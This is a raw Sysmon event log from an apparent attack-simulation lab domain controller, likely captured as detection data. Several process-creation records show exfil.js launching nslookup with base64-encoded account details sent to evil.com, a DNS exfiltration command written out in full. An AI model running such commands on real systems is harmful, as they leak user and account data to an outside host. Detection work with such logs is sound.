4d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.136{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.136{2E1864BB-17A1-629A-783D-000000005F02}55523452C:\Windows\System32\WScript.exe{2E1864BB-17A7-629A-D33D-000000005F02}1772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.137{2E1864BB-17A7-629A-D33D-000000005F02}1772C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfupjcz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.120{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldbv.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000194488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.100{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E413A6B884636DEE6D97FEC66F848E5,SHA256=0851CF1DAE41CF7811E8D4DED8DA03EEFF4F4D76ED22101026A84A746B957B88,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.082{2E1864BB-17A7-629A-D13D-000000005F02}42407312C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-D23D-000000005F02}4864C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.082{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.082{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.082{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.082{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.082{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-D23D-000000005F02}4864C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.082{2E1864BB-17A7-629A-D03D-000000005F02}57207652C:\Windows\system32\cmd.exe{2E1864BB-17A7-629A-D23D-000000005F02}4864C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.090{2E1864BB-17A7-629A-D23D-000000005F02}4864C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A7-629A-D03D-000000005F02}5720C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldbv.tmp 2>&1 354300x8000000000000000194479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.648{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52123- 354300x8000000000000000194478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.648{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52122- 354300x8000000000000000194477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.648{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52121- 354300x8000000000000000194476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.648{00000000-0000-0000-0000-000000000000}420<unknown process>-udptruefalse127.0.0.1-52121-false127.0.0.1-53domain 354300x8000000000000000194475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.517{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52120- 354300x8000000000000000194474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.517{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52119- 354300x8000000000000000194473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.516{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52118- 354300x8000000000000000194472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.376{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52117- 354300x8000000000000000194471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.376{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52116- 354300x8000000000000000194470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.374{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52115- 354300x8000000000000000194469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.118{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52114- 354300x8000000000000000194468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.117{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52113- 354300x8000000000000000194467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.117{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52112- 354300x8000000000000000194466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.115{00000000-0000-0000-0000-000000000000}7992<unknown process>-udptruefalse127.0.0.1-52112-false127.0.0.1-53domain 354300x8000000000000000194465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.966{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52111- 354300x8000000000000000194464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.966{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52110- 354300x8000000000000000194463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.965{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52109- 354300x8000000000000000194462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.965{00000000-0000-0000-0000-000000000000}5392<unknown process>-udptruefalse127.0.0.1-52109-false127.0.0.1-53domain 354300x8000000000000000194461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.868{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52108- 354300x8000000000000000194460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.862{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52107- 10341000x8000000000000000194459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.066{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-D13D-000000005F02}4240C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000194458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.066{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=132C42CFAFA393CD12C7DFE537FA2046,SHA256=2DE62C9D56EBE96B9F89E27BE4D6F25D5AD2600F9493462D500D9D13CE4C7C2D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.066{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-D13D-000000005F02}4240C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.051{2E1864BB-17A7-629A-D13D-000000005F02}42407312C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-D03D-000000005F02}5720C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.051{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-D13D-000000005F02}4240C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.035{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.035{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.035{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.035{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.035{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-D03D-000000005F02}5720C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.035{2E1864BB-17A1-629A-783D-000000005F02}5552376C:\Windows\System32\WScript.exe{2E1864BB-17A7-629A-D03D-000000005F02}5720C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.038{2E1864BB-17A7-629A-D03D-000000005F02}5720C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldbv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000194447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 